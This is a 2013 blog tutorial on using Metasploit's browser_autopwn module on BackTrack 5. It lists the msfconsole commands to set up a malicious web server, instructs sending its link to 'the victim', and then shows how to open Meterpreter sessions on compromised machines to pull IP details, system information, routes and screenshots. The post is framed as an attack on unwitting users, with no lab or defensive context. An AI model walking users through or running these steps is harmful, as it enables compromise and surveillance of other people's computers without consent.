Saturday 18 May 2013

AUTOPWN THE BROWSER ON BACKTRACK 5

* First step is to open a terminal and enter the command 'msfconsole '.
* Command Used : msfconsole






msfconsole

SETUP MODULE

* Command Used : use server/browser_autopwn
-

setup module

SHOW OPTIONS

* Use this comamnd to see all the Module Options .

show options

SET LHOST & URIPATH

* Now set the Local Host( Local Host ).
* Command Used : set LHOST
* Set the URIPATH Address .
* Command Used : set URIPATH /


set lhost and uripath

RUN

* Run your Module .
* Command Used : run


run module

* The below image shows the local ip , send that ip to the victim .
* It look like http://192.168.118.136:8080/
* When the user open this link in his browser , it gives the response
* If the victim browser is vulnerable , it open a sessions.
* See the below image for more details -

session list

SESSION LIST

* Command Used : sessions -l
* It shows the Active sessions name Information and connect.


session list

OPEN SESSIONS

* To open the Active sessions ,enter the command given below .
* Command Used : sessions -i 1


open sessions

METERPRETER SESSIONS

* Once you are in use different commands to gather information -
* Command 1 : ipconfig : Used this command to get the ip address of remote system
* Command 2 : systeminfo : It shows the system information .
-

meterpreter sessions

ROUTE COMMAND

* See the below image for more details - it shows the Subnet Netmask and Gateway .

route command

SCREENSHOT

* Command Used : screenshot
* With this command you can take a screenshot of a victim machine .


screenshots
THIS IS HOW WE CAN AUTOPWN THE BROWSER ON BACKTRACK 5

No comments:

Post a Comment